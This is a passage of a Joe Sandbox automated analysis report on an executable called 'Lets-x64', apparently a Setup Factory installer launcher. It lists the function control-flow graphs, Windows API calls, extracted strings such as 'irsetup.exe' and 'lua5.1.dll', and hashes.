7ff668853430 _invalid_parameter_noinfo 17 API calls 3223->3225 3224->3221 3227 7ff668855ff2 3224->3227 3226 7ff668853e9b 3225->3226 3226->2549 3226->2552 3227->3226 3228 7ff668853820 _errno 62 API calls 3227->3228 3228->3223 3247 7ff66885348c EncodePointer 3229->3247 3249 7ff6688521c6 GetProcAddress 3248->3249 3250 7ff6688521db ExitProcess 3248->3250 3249->3250 3354 7ff668853840 3355 7ff668854e54 __onexitinit 62 API calls 3354->3355 3356 7ff668853853 EncodePointer 3355->3356 3357 7ff668853872 3356->3357 3358 7ff668853620 3359 7ff668853629 3358->3359 3387 7ff668853748 3358->3387 3360 7ff668853644 3359->3360 3361 7ff668852a80 free 62 API calls 3359->3361 3362 7ff668853652 3360->3362 3363 7ff668852a80 free 62 API calls 3360->3363 3361->3360 3364 7ff668853660 3362->3364 3366 7ff668852a80 free 62 API calls 3362->3366 3363->3362 3365 7ff66885366e 3364->3365 3367 7ff668852a80 free 62 API calls 3364->3367 3368 7ff66885367c 3365->3368 3369 7ff668852a80 free 62 API calls 3365->3369 3366->3364 3367->3365 3370 7ff66885368a 3368->3370 3371 7ff668852a80 free 62 API calls 3368->3371 3369->3368 3372 7ff66885369b 3370->3372 3373 7ff668852a80 free 62 API calls 3370->3373 3371->3370 3374 7ff6688536b3 3372->3374 3376 7ff668852a80 free 62 API calls 3372->3376 3373->3372 3375 7ff668852f3c _lock 62 API calls 3374->3375 3377 7ff6688536bf 3375->3377 3376->3374 3380 7ff668852a80 free 62 API calls 3377->3380 3382 7ff6688536ec 3377->3382 3380->3382 3390 7ff668852e3c LeaveCriticalSection 3382->3390

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF668851C88 Relevance: 70.2, APIs: 32, Strings: 8, Instructions: 224stringwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7ff668851c88-7ff668851d50 call 7ff668852580 * 3 wsprintfA lstrlenA 7 7ff668851d52-7ff668851d58 lstrcatA 0->7 8 7ff668851d5e-7ff668851e25 lstrcatA wsprintfA lstrcatA * 2 wsprintfA lstrcatA * 2 wsprintfA lstrcatA * 2 GetCurrentProcess OpenProcessToken 0->8 7->8 9 7ff668851ecb-7ff668851ed2 8->9 10 7ff668851e2b-7ff668851e40 call 7ff668852ac0 8->10 11 7ff668851ee9-7ff668851f43 call 7ff668852580 ShellExecuteExA 9->11 12 7ff668851ed4-7ff668851ee3 MessageBoxA 9->12 10->9 16 7ff668851e46-7ff668851e69 GetTokenInformation 10->16 19 7ff668851f75-7ff668851f7c 11->19 20 7ff668851f45-7ff668851f50 GetLastError 11->20 12->11 16->9 18 7ff668851e6b-7ff668851e82 call 7ff668851908 16->18 31 7ff668851ec3-7ff668851ec6 call 7ff668852a80 18->31 32 7ff668851e84-7ff668851e8c 18->32 21 7ff668851fe2-7ff668852006 GetExitCodeProcess 19->21 22 7ff668851f7e-7ff668851f86 19->22 24 7ff668851f6b-7ff668851f70 20->24 25 7ff668851f52-7ff668851f66 lstrcpyA 20->25 29 7ff668852008-7ff668852012 21->29 30 7ff668852014-7ff668852018 CloseHandle 21->30 27 7ff668851fc6-7ff668851fe0 MsgWaitForMultipleObjects 22->27 26 7ff66885201e-7ff66885204a call 7ff668852680 24->26 25->26 27->21 33 7ff668851fab-7ff668851fc4 PeekMessageA 27->33 29->30 30->26 31->9 32->31 35 7ff668851e8e-7ff668851ebd wsprintfA lstrcatA * 2 LocalFree 32->35 33->27 36 7ff668851f88-7ff668851f8c 33->36 35->31 39 7ff668851f97-7ff668851fa5 TranslateMessage DispatchMessageA 36->39 40 7ff668851f8e-7ff668851f95 36->40 39->33 40->33 40->39
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$wsprintf$Process$Token$CloseCodeCurrentErrorExecuteExitFreeHandleInformationLastLocalMessageMultipleObjectsOpenShellWaitfreelstrcpylstrlenmalloc
                                                                                                                    • String ID: "__IRAFN:%s"$"__IRCT:%d"$"__IRSID:%s"$"__IRTSS:%I64u"$@$Could not start the setup$__IRAOFF:%I64u$open
                                                                                                                    • API String ID: 1484400040-1136106755
                                                                                                                    • Opcode ID: dc511f67e071428669a0f2c12411c56f263dd82a6b2ccece939b67f281d95484
                                                                                                                    • Instruction ID: 527471fa40da41d3d42e00df8b645242e8b9656159463ad5884504198b065bd2
                                                                                                                    • Opcode Fuzzy Hash: dc511f67e071428669a0f2c12411c56f263dd82a6b2ccece939b67f281d95484
                                                                                                                    • Instruction Fuzzy Hash: 28B13832A58B42D6EB94CF31E8445AA67B0FF48789F40403ADA4F8BA64DF3CE159C705
                                                                                                                    Function 00007FF6688519B4 Relevance: 63.2, APIs: 28, Strings: 8, Instructions: 153stringfileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$lstrcpy$Currentlstrcatlstrlen$Create$Filewsprintf$AttributesDeleteDiskFreePathRemoveSpaceTemp
                                                                                                                    • String ID: %s%s_%d$%s\irsetup.exe$Could not determine a temp directory name. Try running setup.exe /T:<Path>$You must have at least 2MB of free space on your TEMP drive!$_ir_sf_temp$c:\temp$irsetup.exe$lua5.1.dll
                                                                                                                    • API String ID: 3816071345-4167539251
                                                                                                                    • Opcode ID: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
                                                                                                                    • Instruction ID: 5780f1d25c1ecb96d1b16b7fe068d604249d3dda0f2131d778cc7a232083d20c
                                                                                                                    • Opcode Fuzzy Hash: 099cdf72516c0135f1b5aa9ac0640ce91bc81016b26d1f710b104e2d1a9d3ea1
                                                                                                                    • Instruction Fuzzy Hash: AB812A32668A87D6EB80DF30E8941AAA371FF84745F80503AD64F8A964EF7CE54DC705
                                                                                                                    Function 00007FF668854260 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 264 7ff668854260-7ff668854286 HeapCreate 265 7ff668854288-7ff668854290 GetVersion 264->265 266 7ff6688542b1-7ff6688542b5 264->266 267 7ff6688542ac 265->267 268 7ff668854292-7ff6688542a6 HeapSetInformation 265->268 267->266 268->267
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateInformationVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3563531100-0
                                                                                                                    • Opcode ID: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
                                                                                                                    • Instruction ID: 1ce87468bb8247c8fe6e15927cdf64b09f4844723d67e5f7ea55b40fdec979d6
                                                                                                                    • Opcode Fuzzy Hash: c9ef4103069467bc3e1cbfb86f8ddfe3974583134bc7e4447d0960c5f6b28c4e
                                                                                                                    • Instruction Fuzzy Hash: 9EE06D74A29B52C2FBC46771A8157762270FFC8341F80003DE90F8AB54DF3C9085860A
                                                                                                                    Function 00007FF6688512AC Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 167stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 65 7ff6688512ac-7ff6688512e5 _lopen 66 7ff6688512e7-7ff6688512fb lstrcpyA 65->66 67 7ff668851300-7ff668851310 call 7ff668852ac0 65->67 68 7ff66885155b-7ff668851577 call 7ff668852a80 66->68 72 7ff66885132b-7ff668851333 SetFilePointer 67->72 73 7ff668851312-7ff668851326 lstrcpyA 67->73 75 7ff668851339-7ff668851340 72->75 73->68 76 7ff668851346-7ff668851365 _lread 75->76 77 7ff668851545 75->77 79 7ff66885136b-7ff66885136f 76->79 80 7ff6688513f0-7ff6688513f3 76->80 78 7ff66885154c-7ff668851556 lstrcpyA 77->78 78->68 81 7ff6688513e2-7ff6688513ea 79->81 82 7ff668851371-7ff668851377 79->82 80->75 81->79 81->80 82->81 83 7ff668851379-7ff66885137e 82->83 83->81 84 7ff668851380-7ff668851385 83->84 84->81 85 7ff668851387-7ff66885138c 84->85 85->81 86 7ff66885138e-7ff668851393 85->86 86->81 87 7ff668851395-7ff66885139a 86->87 87->81 88 7ff66885139c-7ff6688513a1 87->88 88->81 89 7ff6688513a3-7ff6688513a8 88->89 89->81 90 7ff6688513aa-7ff6688513af 89->90 90->81 91 7ff6688513b1-7ff6688513b6 90->91 91->81 92 7ff6688513b8-7ff6688513bd 91->92 92->81 93 7ff6688513bf-7ff6688513c4 92->93 93->81 94 7ff6688513c6-7ff6688513cb 93->94 94->81 95 7ff6688513cd-7ff6688513d2 94->95 95->81 96 7ff6688513d4-7ff6688513d9 95->96 96->81 97 7ff6688513db-7ff6688513e0 96->97 97->81 98 7ff6688513f8-7ff668851434 SetFilePointer _lread 97->98 99 7ff668851436-7ff66885143d 98->99 100 7ff668851442-7ff66885144e 98->100 99->78 101 7ff66885145a-7ff668851492 SetFilePointer _lread 100->101 102 7ff668851450 100->102 103 7ff668851494-7ff66885149b 101->103 104 7ff6688514a0-7ff6688514e2 SetFilePointer _lread 101->104 102->101 103->78 105 7ff6688514ed-7ff668851522 SetFilePointer _lread 104->105 106 7ff6688514e4-7ff6688514eb 104->106 107 7ff66885153c-7ff668851543 105->107 108 7ff668851524-7ff66885153a lstrcpyA 105->108 106->78 107->68 108->68
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpy$_lopenfreemalloc
                                                                                                                    • String ID: Could not find compression type indicator$Could not find data segment$Could not find multi-segment indicator$Could not find setup size$Could not find total size indicator$Unable to allocate memory buffer$Unable to open archive file
                                                                                                                    • API String ID: 2570182538-3063878580
                                                                                                                    • Opcode ID: 52b639742314e37657841c789f1007307af1c7c9b1b5e16dccf3db46395a60ee
                                                                                                                    • Instruction ID: 9e9a0980193e88985902b761bdd6702db5ca4d7e595ec846726812e2bd39e87c
                                                                                                                    • Opcode Fuzzy Hash: 52b639742314e37657841c789f1007307af1c7c9b1b5e16dccf3db46395a60ee
                                                                                                                    • Instruction Fuzzy Hash: 5781D435A18B83E6E7A88F3494805A96331FF457A4F14423AD62B8F5D0CF3CE556C30A
                                                                                                                    Function 00007FF668851694 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 88stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpy$FilePointer_lread$_lclose_lcreat_lwritefreemalloc
                                                                                                                    • String ID: Could not find Lua DLL file size$Failed to alloc memory.$Failed to read Lua DLL$Unable to open Lua DLL file$Unable to write to Lua file.
                                                                                                                    • API String ID: 1949781031-3124031069
                                                                                                                    • Opcode ID: 374f909517fa19264f801e9e43d51d13031991a0c2f6e96994e0c89afccb86b8
                                                                                                                    • Instruction ID: b07661c0eb41c20327aabd73e6125cf2b8820162262b682c14fab02dec0f5754
                                                                                                                    • Opcode Fuzzy Hash: 374f909517fa19264f801e9e43d51d13031991a0c2f6e96994e0c89afccb86b8
                                                                                                                    • Instruction Fuzzy Hash: DC415E35B68B42D3EB949B35E88046A6371FF88B94F404039DA1F8BA64DF3CE559C705
                                                                                                                    Function 00007FF668851000 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 119stringwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$Cursorlstrcpy$CompareLoadMessageString
                                                                                                                    • String ID: /~DBG$Launcher Error
                                                                                                                    • API String ID: 4294429971-151238577
                                                                                                                    • Opcode ID: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
                                                                                                                    • Instruction ID: 7d06eeb47da56689ff46b0b4d7060c255f8a1e55630fa7dccb4681a04f5ade3b
                                                                                                                    • Opcode Fuzzy Hash: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
                                                                                                                    • Instruction Fuzzy Hash: 8E513635A58B82C9EBA08F3098451E923B1FF84794F80113AD51FCA6A5DF7CE645CB0A
                                                                                                                    Function 00007FF668851578 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnolstrcpy$AllocFileHeapPointer_callnewh_lclose_lcreat_lread_lwritefreemalloc
                                                                                                                    • String ID: Failed to read setup engine$Unable to open setup file
                                                                                                                    • API String ID: 3486659530-2055280143
                                                                                                                    • Opcode ID: b55acdce389c2c4367aa3d2a605e31da1710affe7b17a6ee5be05dbc7ec7491b
                                                                                                                    • Instruction ID: 7c8f97905bec1e827668060f8a0db906597e2d5546cc546dbe3eb37cc2900e06
                                                                                                                    • Opcode Fuzzy Hash: b55acdce389c2c4367aa3d2a605e31da1710affe7b17a6ee5be05dbc7ec7491b
                                                                                                                    • Instruction Fuzzy Hash: AA31AD35A18B42C6DB948F35E8400B92371EF88BA8F580139DE1F8F7A4DE3CE4858709
                                                                                                                    Function 00007FF668852B80 Relevance: 18.1, APIs: 12, Instructions: 93COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 181 7ff668852b80-7ff668852bad GetStartupInfoW 182 7ff668852bb3-7ff668852bc3 181->182 183 7ff668852baf-7ff668852bb1 181->183 182->183 185 7ff668852bc5-7ff668852bce 182->185 184 7ff668852be4-7ff668852bf2 call 7ff668854260 183->184 190 7ff668852c16-7ff668852c1d call 7ff668853754 184->190 191 7ff668852bf4-7ff668852bfb 184->191 185->183 186 7ff668852bd0-7ff668852bd9 185->186 186->184 188 7ff668852bdb-7ff668852be1 186->188 188->184 199 7ff668852c1f-7ff668852c26 190->199 200 7ff668852c41-7ff668852c4e call 7ff6688539a8 call 7ff668854a4c 190->200 193 7ff668852bfd call 7ff668853fa0 191->193 194 7ff668852c02-7ff668852c11 call 7ff668853d40 call 7ff6688521e8 191->194 193->194 194->190 202 7ff668852c2d-7ff668852c3c call 7ff668853d40 call 7ff6688521e8 199->202 203 7ff668852c28 call 7ff668853fa0 199->203 212 7ff668852c5a-7ff668852c7a GetCommandLineA call 7ff668854958 call 7ff668854860 200->212 213 7ff668852c50-7ff668852c55 call 7ff668852544 200->213 202->200 203->202 219 7ff668852c7c-7ff668852c81 call 7ff668852544 212->219 220 7ff668852c86-7ff668852c8d call 7ff668854560 212->220 213->212 219->220 224 7ff668852c99-7ff668852ca5 call 7ff6688522cc 220->224 225 7ff668852c8f-7ff668852c94 call 7ff668852544 220->225 229 7ff668852ca7-7ff668852ca9 call 7ff668852544 224->229 230 7ff668852cae-7ff668852ccf call 7ff6688544e4 call 7ff668851000 224->230 225->224 229->230 235 7ff668852cd4-7ff668852cdc 230->235 236 7ff668852ce5-7ff668852d18 call 7ff668852524 235->236 237 7ff668852cde-7ff668852ce0 call 7ff66885250c 235->237 237->236
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4082634633-0
                                                                                                                    • Opcode ID: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
                                                                                                                    • Instruction ID: 94947d078d768858758a38ccb30f35c30105daea2f717460a08865309f1dfe78
                                                                                                                    • Opcode Fuzzy Hash: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
                                                                                                                    • Instruction Fuzzy Hash: 9B410870E48343C6FAE56B7195223B962B1AF89745F40403DE64FCE2D7EF6CA840865B
                                                                                                                    Function 00007FF66885204C Relevance: 10.6, APIs: 7, Instructions: 57filesleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF6688512AC: _lopen.KERNEL32 ref: 00007FF6688512D4
                                                                                                                      • Part of subcall function 00007FF6688512AC: lstrcpyA.KERNEL32(?,00000000,?,00007FF668852066), ref: 00007FF6688512F2
                                                                                                                      • Part of subcall function 00007FF6688512AC: free.LIBCMT ref: 00007FF66885155E
                                                                                                                    • Sleep.KERNEL32 ref: 00007FF6688520AE
                                                                                                                    • DeleteFileA.KERNEL32 ref: 00007FF6688520C4
                                                                                                                    • DeleteFileA.KERNEL32 ref: 00007FF6688520D1
                                                                                                                    • RemoveDirectoryA.KERNEL32 ref: 00007FF6688520DE
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetCurrentDirectoryA.KERNEL32 ref: 00007FF6688519F5
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetTempPathA.KERNEL32 ref: 00007FF668851A11
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851A1E
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851A48
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851A58
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcatA.KERNEL32 ref: 00007FF668851A74
                                                                                                                      • Part of subcall function 00007FF6688519B4: wsprintfA.USER32 ref: 00007FF668851AA2
                                                                                                                      • Part of subcall function 00007FF6688519B4: wsprintfA.USER32 ref: 00007FF668851ABA
                                                                                                                      • Part of subcall function 00007FF6688519B4: DeleteFileA.KERNELBASE ref: 00007FF668851AC7
                                                                                                                      • Part of subcall function 00007FF6688519B4: RemoveDirectoryA.KERNELBASE ref: 00007FF668851AD1
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetFileAttributesA.KERNELBASE ref: 00007FF668851ADB
                                                                                                                      • Part of subcall function 00007FF6688519B4: CreateDirectoryA.KERNELBASE ref: 00007FF668851AEC
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851AFB
                                                                                                                      • Part of subcall function 00007FF6688519B4: SetCurrentDirectoryA.KERNELBASE ref: 00007FF668851B06
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B1C
                                                                                                                      • Part of subcall function 00007FF6688519B4: CreateDirectoryA.KERNEL32 ref: 00007FF668851B29
                                                                                                                      • Part of subcall function 00007FF6688519B4: SetCurrentDirectoryA.KERNEL32 ref: 00007FF668851B34
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B49
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851B59
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcatA.KERNEL32 ref: 00007FF668851B75
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B87
                                                                                                                    • MoveFileExA.KERNEL32 ref: 00007FF6688520EC
                                                                                                                    • MoveFileExA.KERNEL32 ref: 00007FF6688520FF
                                                                                                                    • MoveFileExA.KERNEL32 ref: 00007FF668852112
                                                                                                                      • Part of subcall function 00007FF668851578: malloc.LIBCMT ref: 00007FF668851598
                                                                                                                      • Part of subcall function 00007FF668851578: SetFilePointer.KERNELBASE ref: 00007FF6688515BB
                                                                                                                      • Part of subcall function 00007FF668851578: _lread.KERNEL32(?,?,00000000,00007FF668852082), ref: 00007FF6688515D1
                                                                                                                      • Part of subcall function 00007FF668851578: _lcreat.KERNEL32 ref: 00007FF6688515EB
                                                                                                                      • Part of subcall function 00007FF668851578: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852082), ref: 00007FF668851603
                                                                                                                      • Part of subcall function 00007FF668851578: free.LIBCMT ref: 00007FF66885166A
                                                                                                                      • Part of subcall function 00007FF668851578: _lclose.KERNEL32 ref: 00007FF668851676
                                                                                                                      • Part of subcall function 00007FF668851694: SetFilePointer.KERNELBASE ref: 00007FF6688516C0
                                                                                                                      • Part of subcall function 00007FF668851694: _lread.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF6688516D5
                                                                                                                      • Part of subcall function 00007FF668851694: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF6688516EB
                                                                                                                      • Part of subcall function 00007FF668851694: malloc.LIBCMT ref: 00007FF668851705
                                                                                                                      • Part of subcall function 00007FF668851694: SetFilePointer.KERNELBASE ref: 00007FF668851725
                                                                                                                      • Part of subcall function 00007FF668851694: _lread.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF668851739
                                                                                                                      • Part of subcall function 00007FF668851694: _lcreat.KERNEL32 ref: 00007FF668851755
                                                                                                                      • Part of subcall function 00007FF668851694: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF66885176D
                                                                                                                      • Part of subcall function 00007FF668851694: free.LIBCMT ref: 00007FF6688517D6
                                                                                                                      • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851D31
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrlenA.KERNEL32 ref: 00007FF668851D41
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D58
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D65
                                                                                                                      • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851D7D
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D89
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D96
                                                                                                                      • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851DAF
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DBB
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DC8
                                                                                                                      • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851DE0
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DEC
                                                                                                                      • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DF9
                                                                                                                      • Part of subcall function 00007FF668851C88: GetCurrentProcess.KERNEL32 ref: 00007FF668851E04
                                                                                                                      • Part of subcall function 00007FF668851C88: OpenProcessToken.ADVAPI32 ref: 00007FF668851E17
                                                                                                                      • Part of subcall function 00007FF668851C88: malloc.LIBCMT ref: 00007FF668851E35
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
